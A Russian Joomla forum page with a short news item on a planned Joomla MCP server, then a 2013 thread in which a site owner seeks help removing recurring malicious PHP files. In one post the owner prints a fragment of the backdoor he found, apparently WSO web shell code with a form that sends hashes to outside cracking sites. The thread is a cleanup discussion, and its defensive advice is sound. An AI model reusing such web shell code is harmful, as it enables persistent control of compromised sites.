Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 14 Ответов
  • 10690 Просмотров
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
Доброе время суток
 столкнулся с данной проблемой

письмо от хостера

Обращаем Ваше внимание на то, что на Вашем аккаунте опять было обнаружено
вредоносное содержимое.

Примеры вредоносных скриптов:

/administrator/index.1.php
/administrator/index.bak.php
/administrator/index.class.php
/administrator/index.inc.php


Убедительная просьба в кратчайшие сроки проверить аккаунт на наличие
вредоносного содержимого и внимательно следить за работой своего аккаунта.
В случае повторения ситуации, работа аккаунта будет приостановлена.

я их удалил
но все повторилось

причем в папке administrator/

создаются очень много файлов
во такого названия

   
lock41f6601ff986f6d7126ac8e41e57885a
21 B   -rw-r--r--   
   
res0edfd385c41fca147c559328d544ce4a
8.59 KB   -rw-r--r--   
   
res41f6601ff986f6d7126ac8e41e57885a
1.03 KB   -rw-r--r--   

если кто сталкивался подскажите буду признателен материально
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Вы удаляете файлы, а нужно еще удалить шелл, бекдор, с помощью которого заливаются эти левые файлы.
Сканеры и инструменты защиты Joomla, в разделе Безопасность.
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
сканировал по удалял
а они как грибы
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
поудалял пишется слитно.

Нужно не симптомы лечить, а болезнь. В вашем случае надо найти шелл, бэкдор ... вам выше написали
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
не подскажите чем?
AD Search&Replace чтото не чего не дал
*

Pazys

  • Завсегдатай
  • 1738
  • 241 / 4
  • <a>А где я ошибся-то?</b>
Ишак меня нюхал ...
Если помог - плюсуйте в карму.
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
не подскажите чем?
Подсказать-то можно, только без обид. Удалять нужно головой.
Всё остальное - инструменты, которые могут быть разными или не быть вовсе.
Универсального рецепта, гарантирующего успех, и пошаговой инструкции "что" и "как" делать - нет и быть не может в принципе.
Это вам не Касперский, тут думать надо (с) wishlight

Для начала поставь на директорию /administrator Basic-пароль и включи запись логов доступа (http, ftp), если не включена.
Потом убей вражеские файлы и начинай читать логи. Если не понимаешь, что в логах искать - ищи человека, который понимает.
Любые "искалки" - полумера, никаких гарантий не дающая. Правильно настроенная голова даст им всем фору.
Но правильная настройка головы "с нуля" занимает годы. Поэтому реши, нужно ли это тебе, или лучше поручить кому-то.
« Последнее редактирование: 14.03.2013, 15:47:36 от WebDisaster »
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
Вы сможете это сделать?
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
NHL09, ответ в личных сообщениях.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
сканировал по удалял а они как грибы
Так закрой админку, создав файл .htaccess  и положи в /administrator. А  будет нужно войти в админку, просто закоментируешь две строки.
Код
####  NO  Enter 
Order Deny,Allow

Deny from all
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
походу нашел
modules\mod_articles/mod_articles.php01
имено имя было фала mod_articles.php01
его содержимое
Спойлер
[свернуть]
« Последнее редактирование: 19.03.2013, 16:25:25 от NHL09 »
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
if(@$_POST['p3'])
      wsoRecursiveGlob($_POST['c']);
   echo "</div><br><h1>Search for hash:</h1><div class=content>
      <form method='post' target='_blank' name='hf'>
         <input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
         <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
         <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
      </form></div>";
   wsoFooter();
}


но как он мог ко мне попасть?
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
да вы правы не все
опять файлы лезут
*

NHL09

  • Осваиваюсь на форуме
  • 24
  • 0 / 0
все вроде победил
много файлов было с окончанием
.1.php
.class.php
.bak.php
.inc.php

в папках  \cli
\includes
\libraries
и д.р.
  удалил все в папках и заменил из чистой Joomla
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

опять вирус ?

Автор mami_

Ответов: 15
Просмотров: 1604
Последний ответ 07.09.2017, 06:20:29
от voland
взломали сайт: подменили содержимое для п

Автор TopClans

Ответов: 10
Просмотров: 1934
Последний ответ 06.05.2016, 10:32:45
от Missile
Пишут, что опять уязвимость найдена

Автор dmtn

Ответов: 9
Просмотров: 3794
Последний ответ 16.12.2015, 20:08:52
от flyingspook
Как назначить странице 403 HTTP заголовок, при этом чтобы посетители видели содержимое страницы?

Автор andrey222

Ответов: 8
Просмотров: 2041
Последний ответ 15.03.2015, 10:56:59
от andrey222
Опять три дня ломятся на сайты

Автор busik

Ответов: 21
Просмотров: 2590
Последний ответ 26.11.2014, 05:28:32
от ander_axel